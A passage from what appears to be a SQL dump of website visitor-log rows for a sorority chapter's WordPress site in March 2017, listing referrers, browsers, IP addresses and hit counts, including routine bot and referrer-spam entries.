,'2017-03-12','http://zphiblgz.org','Firefox','Windows','19.0','','91.200.14.171','000',1,0),(1822,'2017-03-12','http://zphiblgz.org','Chrome','Android','51.0.2704.81','','66.87.122.52','000',1,0),(1823,'2017-03-12','http://zphiblgz.org','Firefox','Windows','40.1','','89.132.201.59','000',2,0),(1824,'2017-03-12','http://zphiblgz.org','Safari','Macintosh','9.1.3','','73.128.240.154','000',3,0),(1825,'2017-03-12','http://zphiblgz.org/','MSIE','Windows','6.0','','198.58.126.42','000',1,0),(1826,'2017-03-12','https://www.google.at/','Safari','iPhone','600.1.4','','91.141.3.197','000',1,0),(1827,'2017-03-12','http://zphiblgz.org','vebidoobot','Unknown','Unknown','','136.243.36.68','000',4,0),(1828,'2017-03-12','android-app://com.google.android.googlequicksearchbox','Chrome','Android','50.0.2661.89','','172.56.22.194','000',1,0),(1829,'2017-03-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','74.208.180.12','000',1,0),(1830,'2017-03-12','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','192.5.18.33','000',6,0),(1831,'2017-03-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','213.136.86.170','000',1,0),(1832,'2017-03-12','http://zphiblgz.org','Firefox','Windows','40.1','','52.32.175.214','000',2,0),(1833,'2017-03-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','80.88.86.23','000',1,0),(1834,'2017-03-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','110.4.45.17','000',1,0),(1835,'2017-03-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','89.42.216.25','000',1,0),(1836,'2017-03-12','http://zphiblgz.org','Firefox','Windows','40.1','','78.57.226.133','000',1,0),(1837,'2017-03-12','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(1838,'2017-03-12','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',1,0),(1839,'2017-03-12','http://zphiblgz.org','Safari','iPad','10.0','','173.73.80.24','000',2,0),(1840,'2017-03-12','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','205.237.92.201','000',1,0),(1841,'2017-03-12','http://zphiblgz.org','Firefox','Windows','40.1','','93.148.252.183','000',2,0),(1842,'2017-03-12','http://zphiblgz.org','Firefox','Macintosh','51.0','','71.179.132.123','000',4,0),(1843,'2017-03-12','http://zphiblgz.org','scrapy-redis','Unknown','Unknown','','125.39.222.252','000',2,0),(1844,'2017-03-12','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','MSIE','Windows','9.0','','5.61.35.44','000',2,0),(1845,'2017-03-12','https://www.google.com/','Safari','iPhone','10.0','','72.83.8.9','000',1,0),(1846,'2017-03-13','http://zphiblgz.org','Firefox','Windows','19.0','','128.52.128.105','000',17,0),(1847,'2017-03-13','http://zphiblgz.org','Firefox','Windows','40.1','','41.205.85.245','000',2,0),(1848,'2017-03-13','http://zphiblgz.org','MSIE','Windows','11.0','','173.208.249.226','000',4,0),(1849,'2017-03-13','http://zphiblgz.org','Chrome','Linux','52.0.2782.25','','109.236.86.17','000',1,0),(1850,'2017-03-13','http://zphiblgz.org','Firefox','Macintosh','46.0','','109.236.86.17','000',1,0),(1851,'2017-03-13','http://zphiblgz.org','Firefox','Linux','37.0','','109.236.86.17','000',1,0),(1852,'2017-03-13','http://zphiblgz.org','Firefox','Linux','29.0','','109.236.86.17','000',1,0),(1853,'2017-03-13','http://zphiblgz.org','Firefox','Windows','43.0','','109.236.86.17','000',1,0),(1854,'2017-03-13','http://zphiblgz.org','Chrome','Linux','50.0.2693.8','','109.236.86.17','000',1,0),(1855,'2017-03-13','http://zphiblgz.org','Chrome','Linux','48.0.2604.80','','109.236.86.17','000',2,0),(1856,'2017-03-13','http://zphiblgz.org','MSIE','Windows','9.0','','109.236.86.17','000',3,0),(1857,'2017-03-13','http://zphiblgz.org','Chrome','Windows','34.0.1866.83','','109.236.86.17','000',2,0),(1858,'2017-03-13','http://zphiblgz.org','Chrome','Linux','12.0.742.112','','94.23.27.166','000',82,0),(1859,'2017-03-13','http://ya.ru/?q=http%3A%2F%2Fzphiblgz.org%2Fimplenentation','Firefox','Windows','14.0.1','','195.242.80.18','000',1,0),(1860,'2017-03-13','http://zphiblgz.org','Firefox','Windows','40.1','','93.32.78.31','000',2,0),(1861,'2017-03-13','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','96.234.210.155','000',5,0),(1862,'2017-03-13','http://zphiblgz.org','Firefox','Windows','40.1','','78.96.248.131','000',2,0),(1863,'2017-03-13','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.118','000',1,0),(1864,'2017-03-13','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(1865,'2017-03-13','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(1866,'2017-03-13','http://zphiblgz.org','MSIE','Windows','6.0','','85.93.31.146','000',1,0),(1867,'2017-03-13','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwj43rG1ndTSAhVO1mMKHVLfD_UQFgglMAI&url=http%3A%2F%2Fzphiblgz.org%2Fmembers%2F&usg=AFQjCNFgZbtoqBvluWLy-IlewLRqAI444g&bvm=bv.149397726,d.cGc','MSIE','Windows','11.0','','192.189.187.110','000',1,0),(1868,'2017-03-13','http://zphiblgz.org','Firefox','Windows','40.1','','189.90.97.245','000',2,0),(1869,'2017-03-13','http://zphiblgz.org','Unknown','Unknown','Unknown','','51.254.35.240','000',2,0),(1870,'2017-03-13','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','195.154.199.145','000',2,0),(1871,'2017-03-13','http://zphiblgz.org','Firefox','Windows','40.1','','177.64.73.227','000',2,0),(1872,'2017-03-13','http://zphiblgz.org','Firefox','Windows','40.1','','96.127.223.254','000',2,0),(1873,'2017-03-13','https://www.google.com/','Chrome','Android','51.0.2704.106','','73.133.237.94','000',1,0),(1874,'2017-03-13','http://zphiblgz.org','Chrome','Windows','44.0.2451.41','','23.250.70.239','000',2,0),(1875,'2017-03-13','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','69.143.140.209','000',6,0),(1876,'2017-03-13','http://zphiblgz.org','Unknown','Unknown','Unknown','','203.45.244.248','000',2,0),(1877,'2017-03-13','http://zphiblgz.org','MSIE','Windows','7.0','','100.36.61.208','000',2,0),(1878,'2017-03-13','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','100.36.61.208','000',4,0),(1879,'2017-03-13','http://zphiblgz.org/proxy.php','Chrome','Windows','42.0.2311.152','','163.172.52.168','000',1,0),(1880,'2017-03-13','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.84','000',1,0),(1881,'2017-03-13','http://zphiblgz.org','Chrome','Windows','28.0.1500.95','','54.161.201.234','000',6,0),(1882,'2017-03-13','http://zphiblgz.org','Chrome','Windows','28.0.1500.95','','52.87.223.91','000',2,0),(1883,'2017-03-13','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','195.154.199.151','000',2,0),(1884,'2017-03-13','http://zphiblgz.org','Mnogosearch-3','Unknown','Unknown','','173.49.24.118','000',1,0),(1885,'2017-03-13','http://search.mywebsearch.com/mywebsearch/GGweb.jhtml?n=77C09F4F&ptb=8B3DZ8JHCE8O7huJYgXpZw&ptnrS=ZLxdm024YYUS&qs=&ss=sub&st=hp&tpr=sbt&ts=1489461619099&searchfor=zeta+phi+beta+sorority+scholarship&pn=2&ots=1489462377929','MSIE','Windows','9.0','','69.87.232.145','000',1,0),(1886,'2017-03-14','http://zphiblgz.org/wp-admin/post.php?post=1020&action=edit','Safari','iPhone','10.0','','50.164.59.70','000',3,0),(1887,'2017-03-14','http://zphiblgz.org','Firefox','Windows','40.1','','59.96.113.108','000',1,0),(1888,'2017-03-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.118','000',1,0),(1889,'2017-03-14','http://zphiblgz.org','Firefox','Macintosh','49.0','','212.64.170.76','000',1,0),(1890,'2017-03-14','http://zphiblgz.org','Chrome','Windows','51.0.2739.59','','212.64.170.76','000',1,0),(1891,'2017-03-14','http://zphiblgz.org','Firefox','Linux','47.0','','212.64.170.76','000',2,0),(1892,'2017-03-14','http://zphiblgz.org','Chrome','Linux','52.0.2749.15','','212.64.170.76','000',1,0),(1893,'2017-03-14','http://zphiblgz.org','Chrome','Linux','49.0.2647.76','','212.64.170.76','000',1,0),(1894,'2017-03-14','http://zphiblgz.org','MSIE','Windows','11.0','','212.64.170.76','000',2,0),(1895,'2017-03-14','http://zphiblgz.org','Chrome','Linux','53.0.2817.26','','212.64.170.76','000',1,0),(1896,'2017-03-14','http://zphiblgz.org','Chrome','Linux','49.0.2649.98','','212.64.170.76','000',1,0),(1897,'2017-03-14','http://zphiblgz.org','Chrome','Windows','54.0.2869.20','','212.64.170.76','000',1,0),(1898,'2017-03-14','http://zphiblgz.org','Firefox','Linux','48.0','','212.64.170.76','000',1,0),(1899,'2017-03-14','http://zphiblgz.org','Chrome','Windows','50.0.2690.88','','212.64.170.76','000',1,0),(1900,'2017-03-14','http://zphiblgz.org','Firefox','Linux','49.0','','212.64.170.76','000',1,0),(1901,'2017-03-14','http://zphiblgz.org','Chrome','Macintosh','53.0.2831.36','','212.64.170.76','000',1,0),(1902,'2017-03-14','http://zphiblgz.org','Firefox','Macintosh','48.0','','212.64.170.76','000',2,0),(1903,'2017-03-14','http://zphiblgz.org','Chrome','Macintosh','53.0.2786.84','','212.64.170.76','000',1,0),(1904,'2017-03-14','http://zphiblgz.org','Firefox','Windows','40.1','','197.251.179.243','000',2,0),(1905,'2017-03-14','http://zphiblgz.org','Firefox','Linux','45.0','','212.64.170.76','000',1,0),(1906,'2017-03-14','http://zphiblgz.org','Firefox','Windows','40.1','','95.180.90.23','000',2,0),(1907,'2017-03-14','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(1908,'2017-03-14','http://zphiblgz.org','Chrome','Android','56.0.2924.87','','73.133.148.202','000',5,0),(1909,'2017-03-14','https://www.google.com/','Safari','Macintosh','8.0.6','','68.134.37.45','000',8,0),(1910,'2017-03-14','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','62.210.70.188','000',1,0),(1911,'2017-03-14','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','50.164.59.70','000',5,0),(1912,'2017-03-14','http://zphiblgz.org','Safari','Macintosh','10.0.3','','96.244.140.166','000',4,0),(1913,'2017-03-14','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','104.129.194.127','000',16,0),(1914,'2017-03-14','https://www.google.com/','Chrome','Macintosh','49.0.2623.112','','108.28.165.12','000',1,0),(1915,'2017-03-14','http://zphiblgz.org','Firefox','Windows','46.0','','5.101.103.11','000',2,0),(1916,'2017-03-14','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',5,0),(1917,'2017-03-14','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',1,0),(1918,'2017-03-14','http://zphiblgz.org','MSIE','Windows','9.0','','35.167.134.210','000',1,0),(1919,'2017-03-14','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','96.47.226.18','000',1,0),(1920,'2017-03-14','http://zphiblgz.org','Safari','iPhone','10.0','','73.213.165.227','000',1,0),(1921,'2017-03-14','http://www.google.com/','Chrome','Android','56.0.2924.87','','104.6.248.98','000',1,0),(1922,'2017-03-14','http://search.myway.com/search/GGmain.jhtml?p2=%5EBA5%5Exdm164%5ES17547%5Eus&ptb=3BD9448E-BDED-41EA-BEDB-C768C19BC54F&n=782b9883&ind=&tpr=hpsb&trs=wtt&cn=us&ln=en&si=49588_8ball-US-Chrome&brwsid=12b36968-1f85-4c6b-8a92-88f77aed5bea&st=tab&searchfor=ruth%20conway%20scholarship','Chrome','Windows','56.0.2924.87','','173.64.93.2','000',2,0),(1923,'2017-03-14','http://zphiblgz.org/scholarship/','Chrome','Windows','56.0.2924.87','','68.134.22.152','000',2,0),(1924,'2017-03-14','https://www.google.com/','Chrome','Windows','55.0.2883.87','','76.100.56.70','000',1,0),(1925,'2017-03-14','http://zphiblgz.org','Chrome','Macintosh','27.0.1453.110','','192.99.9.164','000',2,0),(1926,'2017-03-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','50.63.197.201','000',1,0),(1927,'2017-03-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','199.16.128.53','000',1,0),(1928,'2017-03-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','91.228.198.238','000',1,0),(1929,'2017-03-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','89.97.234.28','000',1,0),(1930,'2017-03-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','216.64.158.69','000',1,0),(1931,'2017-03-14','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','195.154.199.116','000',1,0),(1932,'2017-03-14','http://w3data.co/profile.php?lookup=zphiblgz.org','Chrome','Windows','40.0.2214.115','','104.156.230.231','000',1,0),(1933,'2017-03-15','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.115','000',1,0),(1934,'2017-03-15','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','Safari','iPad','5.1','','5.61.35.40','000',2,0),(1935,'2017-03-15','http://zphiblgz.org','MSIE','Windows','7.0','','38.100.21.61','000',1,0),(1936,'2017-03-15','http://zphiblgz.org','Firefox','Windows','40.1','','122.52.135.149','000',2,0),(1937,'2017-03-15','http://zphiblgz.org','Firefox','Windows','52.0','','204.126.132.241','000',1,0),(1938,'2017-03-15','http://zphiblgz.org','Firefox','Linux','21.0','','5.9.17.118','000',1,0),(1939,'2017-03-15','https://www.google.com/','Edge','Windows','14.14393','','174.205.3.6','000',9,0),(1940,'2017-03-15','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwjUrvqt-9jSAhWC7yYKHYFGAf0QjBAIKTAD&url=http%3A%2F%2Fzphiblgz.org%2Fprograms%2F&usg=AFQjCNECQhP2O76-B_EHGciyIOEw4nqV9Q','MSIE','Windows','11.0','','104.219.178.15','000',3,0),(1941,'2017-03-15','http://zphiblgz.org','MSIE','Windows','11.0','','214.36.0.135','000',2,0),(1942,'2017-03-15','http://zphiblgz.org','Firefox','Windows','51.0','','50.225.39.91','000',6,0),(1943,'2017-03-15','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','96.47.226.22','000',1,0),(1944,'2017-03-15','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','166.216.165.59','000',2,0),(1945,'2017-03-15','http://r.search.yahoo.com/_ylt=AwrTcc6GjMlYm8YASz4PxQt.;_ylu=X3oDMTBya2cwZmh2BGNvbG8DZ3ExBHBvcwM1BHZ0aWQDBHNlYwNzcg--/RV=2/RE=1489632519/RO=10/RU=http%3a%2f%2fzphiblgz.org%2f/RK=0/RS=1.SE_vlLlS_zRkHIvDv1U5vj3Wo-','Firefox','Windows','52.0','','140.158.41.147','000',5,0),(1946,'2017-03-15','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(1947,'2017-03-15','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',2,0),(1948,'2017-03-15','https://www.google.com/','Chrome','Windows','49.0.2623.87','','198.179.4.254','000',5,0),(1949,'2017-03-15','http://burger-imperia.com/','Chrome','Linux','37.0.2062.120','','185.100.87.143','000',1,0),(1950,'2017-03-15','http://zphiblgz.org','Firefox','Windows','40.1','','86.145.125.54','000',2,0),(1951,'2017-03-15','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','23.22.168.246','000',1,0),(1952,'2017-03-15','http://zphiblgz.org','Firefox','Windows','40.1','','86.120.87.138','000',1,0),(1953,'2017-03-15','http://burger-imperia.com/','Chrome','Linux','37.0.2062.120','','89.38.208.57','000',1,0),(1954,'2017-03-15','https://www.google.com/','Safari','iPhone','10.0','','107.77.72.20','000',1,0),(1955,'2017-03-15','https://www.google.com/','Safari','iPhone','10.0','','100.36.64.26','000',23,0),(1956,'2017-03-15','http://zphiblgz.org','Safari','Macintosh','7.0.3','','52.34.24.19','000',2,0),(1957,'2017-03-15','http://zphiblgz.org/lgz-celebrates-35-years-service-howard-county-md/','Chrome','Windows','48.0.2564.116','','46.119.121.170','000',1,0),(1958,'2017-03-16','http://zphiblgz.org','Chrome','Linux','50.0.2661.75','','163.172.16.251','000',1,0),(1959,'2017-03-16','http://burger-imperia.com/','Chrome','Linux','37.0.2062.120','','51.15.50.10','000',1,0),(1960,'2017-03-16','http://zphiblgz.org','Microsoft','Unknown','Unknown','','108.31.253.77','000',2,0),(1961,'2017-03-16','http://zphiblgz.org','MSIE','Windows','7.0','','108.31.253.77','000',2,0),(1962,'2017-03-16','http://zphiblgz.org','Firefox','Windows','52.0','','108.31.253.77','000',1,0),(1963,'2017-03-16','http://zphiblgz.org','Firefox','Windows','40.1','','106.51.143.85','000',1,0),(1964,'2017-03-16','http://zphiblgz.org','Firefox','Windows','40.1','','36.74.253.59','000',2,0),(1965,'2017-03-16','http://zphiblgz.org','Firefox','Windows','52.0','','50.225.39.75','000',5,0),(1966,'2017-03-16','http://zphiblgz.org','Safari','Macintosh','9.1.3','','50.225.39.76','000',4,0),(1967,'2017-03-16','https://www.google.com/','Edge','Windows','14.14393','','174.205.3.6','000',4,0),(1968,'2017-03-16','http://www.google.com/','Chrome','Android','56.0.2924.87','','174.205.3.6','000',6,0),(1969,'2017-03-16','http://zphiblgz.org','Firefox','Windows','40.1','','217.196.17.242','000',1,0),(1970,'2017-03-16','https://www.google.com/','Chrome','Windows','56.0.2924.87','','72.159.133.5','000',7,0),(1971,'2017-03-16','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.84','000',1,0),(1972,'2017-03-16','https://www.google.com/','Chrome','Windows','56.0.2924.76','','167.102.228.16','000',1,0),(1973,'2017-03-16','http://zphiblgz.org','Firefox','Windows','40.1','','178.164.54.188','000',2,0),(1974,'2017-03-16','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',2,0),(1975,'2017-03-16','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',2,0),(1976,'2017-03-16','http://zphiblgz.org','Microsoft','Unknown','Unknown','','129.2.181.155','000',2,0),(1977,'2017-03-16','http://zphiblgz.org','MSIE','Windows','7.0','','129.2.181.155','000',2,0),(1978,'2017-03-16','http://zphiblgz.org','Firefox','Windows','52.0','','129.2.181.155','000',4,0),(1979,'2017-03-16','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','173.234.164.8','000',1,0),(1980,'2017-03-16','http://zphiblgz.org/.git/','MSIE','Windows','6.0','','37.1.204.92','000',1,0),(1981,'2017-03-16','http://m.baidu.com/s?wd=Home-ZetaPhiBetaSororityInc.%2CLambdaGammaZetaChapter','Safari','iPhone','5.1','','61.135.190.104','000',1,0),(1982,'2017-03-16','http://www.baidu.com/s?wd=Home-ZetaPhiBetaSororityInc.%2CLambdaGammaZetaChapter','Chrome','Windows','36.0.1985.143','','61.135.190.221','000',1,0),(1983,'2017-03-16','https://www.google.com/','Chrome','Windows','56.0.2924.87','','71.244.151.77','000',10,0),(1984,'2017-03-16','http://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.69','000',2,0),(1985,'2017-03-16','http://zphiblgz.org','Firefox','Windows','40.1','','68.44.63.6','000',1,0),(1986,'2017-03-16','https://www.google.com/','Firefox','Windows','52.0','','100.16.224.211','000',6,0),(1987,'2017-03-17','http://zphiblgz.org','Chrome','Windows','52.0.2743.116','','144.217.80.113','000',1,0),(1988,'2017-03-17','http://zphiblgz.org/scholarship/','Chrome','Windows','56.0.2924.87','','68.134.22.152','000',1,0),(1989,'2017-03-17','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','213.202.233.127','000',12,0),(1990,'2017-03-17','http://www.google.com/','Chrome','Android','56.0.2924.87','','72.83.24.223','000',4,0),(1991,'2017-03-17','http://zphiblgz.org','python-requests','Unknown','2.7.0','','54.186.173.113','000',51,0),(1992,'2017-03-17','http://zphiblgz.org','Safari','Linux','534.34','','54.186.173.113','000',54,0),(1993,'2017-03-17','http://zphiblgz.org','Chrome','Windows','28.0.1500.95','','54.152.220.208','000',2,0),(1994,'2017-03-17','http://zphiblgz.org','Firefox','Windows','40.1','','117.203.222.135','000',2,0),(1995,'2017-03-17','http://zphiblgz.org/','MSIE','Windows','6.0','','176.109.249.234','000',2,0),(1996,'2017-03-17','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','50.225.39.86','000',5,0),(1997,'2017-03-17','http://zphiblgz.org','Firefox','Windows','40.1','','89.67.135.143','000',2,0),(1998,'2017-03-17','http://zphiblgz.org','Firefox','Windows','40.1','','122.178.72.18','000',2,0),(1999,'2017-03-17','https://www.bing.com/','Edge','Windows','14.14393','','100.16.224.211','000',4,0),(2000,'2017-03-17','http://zphiblgz.org','Firefox','Windows','40.1','','139.195.47.16','000',1,0),(2001,'2017-03-17','http://zphiblgz.org/members/','Firefox','Windows','44.0','','146.185.223.111','000',3,0),(2002,'2017-03-17','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(2003,'2017-03-17','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(2004,'2017-03-17','http://zphiblgz.org','Firefox','Windows','40.1','','138.185.182.52','000',1,0),(2005,'2017-03-17','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','Chrome','Windows','26.0.1410.64','','5.61.34.51','000',1,0),(2006,'2017-03-17','http://zphiblgz.org/wp-admin/','Safari','iPad','5.1','','5.61.34.51','000',1,0),(2007,'2017-03-17','http://zphiblgz.org','SafeDNSBot','Unknown','Unknown','','95.85.63.192','000',4,0),(2008,'2017-03-17','http://zphiblgz.org','Firefox','Windows','40.1','','79.168.184.184','000',1,0),(2009,'2017-03-17','http://zphiblgz.org','CATExplorador','Unknown','1.0beta','','45.32.150.212','000',2,0),(2010,'2017-03-17','http://zphiblgz.org','Firefox','Windows','40.1','','175.141.94.210','000',2,0),(2011,'2017-03-17','http://m.facebook.com','AppleWebKit','iPhone','602.4.6','','174.205.11.137','000',2,0),(2012,'2017-03-17','https://www.google.com/','Chrome','Android','56.0.2924.87','','174.28.197.90','000',1,0),(2013,'2017-03-18','https://www.google.com/','Safari','iPhone','10.0','','68.42.63.172','000',1,0),(2014,'2017-03-18','http://burger-imperia.com/','Chrome','Linux','37.0.2062.120','','192.160.102.164','000',1,0),(2015,'2017-03-18','http://zphiblgz.org','Firefox','Windows','40.1','','49.149.92.130','000',1,0),(2016,'2017-03-18','http://zpg-headteacher.comuf.com/vrazki.html','Firefox','Windows','43.0','','188.129.236.68','000',1,0),(2017,'2017-03-18','http://zphiblgz.org','Chrome','Windows','27.0.1453.90','','163.172.223.200','000',1,0),(2018,'2017-03-18','http://zphiblgz.org','Firefox','Windows','40.1','','182.19.212.16','000',1,0),(2019,'2017-03-18','http://zphiblgz.org','Chrome','Linux','46.0.2490.80','','91.213.126.133','000',2,0),(2020,'2017-03-18','https://www.google.com/','Safari','Macintosh','10.0.3','','107.145.43.67','000',1,0),(2021,'2017-03-18','http://znaniyapolza.ru/','Opera','Windows','6.01','','46.118.117.16','000',2,0),(2022,'2017-03-18','https://www.google.com/','Safari','Macintosh','10.0.2','','73.84.61.212','000',1,0),(2023,'2017-03-18','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(2024,'2017-03-18','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',1,0),(2025,'2017-03-18','https://www.google.com/','Safari','iPhone','600.1.4','','66.87.81.201','000',4,0),(2026,'2017-03-18','http://zphiblgz.org','MSIE','Windows','11.0','','195.154.211.207','000',2,0),(2027,'2017-03-18','http://zphiblgz.org','Firefox','Windows','40.1','','188.146.74.93','000',2,0),(2028,'2017-03-18','https://www.google.com/','Silk','Kindle Fire','56.2.4','','76.229.226.5','000',1,0),(2029,'2017-03-18','https://search.yahoo.com/','Firefox','Windows','52.0','','107.223.202.85','000',1,0),(2030,'2017-03-18','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(2031,'2017-03-18','http://zphiblgz.org/','MSIE','Windows','11.0','','185.13.156.124','000',1,0),(2032,'2017-03-18','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','96.255.162.155','000',1,0),(2033,'2017-03-18','https://www.google.com/','Chrome','Macintosh','56.0.2924.87','','68.132.180.139','000',1,0),(2034,'2017-03-18','http://autogrep.ru/','MSIE','Windows','4.01','','46.118.122.226','000',1,0),(2035,'2017-03-18','http://zphiblgz.org','Chrome','Linux','36.0.2061.60','','207.210.254.44','000',2,0),(2036,'2017-03-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','74.208.180.149','000',1,0),(2037,'2017-03-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','97.74.24.105','000',1,0),(2038,'2017-03-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','185.13.227.207','000',1,0),(2039,'2017-03-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','162.244.33.16','000',1,0),(2040,'2017-03-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','69.195.124.107','000',1,0),(2041,'2017-03-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','178.254.50.109','000',1,0),(2042,'2017-03-18','https://www.google.com/','Safari','Macintosh','10.0.3','','24.130.53.247','000',5,0),(2043,'2017-03-19','http://guod.me/','Opera','Windows','8.00','','46.118.117.16','000',1,0),(2044,'2017-03-19','http://xn--80aebbcbcdemfkhba4byaehoejh8dza3v.xn--p1ai/','MSIE','Windows','6.0','','178.137.164.87','000',4,0),(2045,'2017-03-19','http://zphiblgz.org','Firefox','Windows','40.1','','41.99.20.46','000',2,0),(2046,'2017-03-19','http://zphiblgz.org','Firefox','Windows','40.1','','78.111.58.45','000',1,0),(2047,'2017-03-19','http://dengi-pod-zalog-pts-avto.ru/','MSIE','Windows','6.0','','46.118.115.43','000',7,0),(2048,'2017-03-19','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','107.161.125.87','000',1,0),(2049,'2017-03-19','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','163.172.106.15','000',1,0),(2050,'2017-03-19','http://zphiblgz.org/','Opera Next','Windows','26.0.1656.60','','144.217.123.93','000',3,0),(2051,'2017-03-19','http://zphiblgz.org','Opera Next','Windows','26.0.1656.60','','192.198.80.227','000',2,0),(2052,'2017-03-19','http://zphiblgz.org','Firefox','Windows','40.1','','61.90.3.54','000',2,0),(2053,'2017-03-19','http://zphiblgz.org','Chrome','Windows','45.0.2454.93','','123.125.67.227','000',1,0),(2054,'2017-03-19','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','35.160.141.209','000',1,0),(2055,'2017-03-19','http://zphiblgz.org','Chrome','Windows','20.0.1090.0','','35.160.141.209','000',1,0),(2056,'2017-03-19','http://zphiblgz.org','Chrome','Macintosh','39.0.2171.95','','139.59.165.189','000',1,0),(2057,'2017-03-19','http://zphiblgz.org','Safari','iPhone','10.0','','174.205.0.53','000',2,0),(2058,'2017-03-19','http://zphiblgz.org','MSIE','Windows','11.0','','23.229.104.238','000',2,0),(2059,'2017-03-19','http://zphiblgz.org/event/ms-walk-2017/','MSIE','Windows','11.0','','189.206.157.177','000',1,0),(2060,'2017-03-19','http://zphiblgz.org','Firefox','Windows','40.1','','86.125.98.136','000',2,0),(2061,'2017-03-19','https://www.google.com/','Chrome','Android','44.0.2403.133','','174.205.3.176','000',2,0),(2062,'2017-03-19','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(2063,'2017-03-19','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',1,0),(2064,'2017-03-19','http://zphiblgz.org','Pinterest','Unknown','0.2','','54.236.1.13','000',1,0),(2065,'2017-03-19','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','199.19.76.218','000',2,0),(2066,'2017-03-19','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','173.208.96.198','000',2,0),(2067,'2017-03-19','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','74.91.44.151','000',2,0),(2068,'2017-03-19','http://zphiblgz.org','Firefox','Windows','29.0','','203.142.42.12','000',2,0),(2069,'2017-03-19','https://www.google.com/','Chrome','Windows','56.0.2924.87','','69.143.35.140','000',18,0),(2070,'2017-03-19','http://stroyhelp-dv.ru/','MSIE','Unknown','6.0','','178.137.164.87','000',3,0),(2071,'2017-03-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','173.254.126.115','000',1,0),(2072,'2017-03-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','202.87.46.199','000',1,0),(2073,'2017-03-19','http://zphiblgz.org','Safari','iPad','10.0','','68.33.94.113','000',3,0),(2074,'2017-03-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','212.227.109.132','000',1,0),(2075,'2017-03-19','http://zphiblgz.org','Safari','iPad','10.0','','73.173.91.7','000',1,0),(2076,'2017-03-19','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','74.91.47.3','000',2,0),(2077,'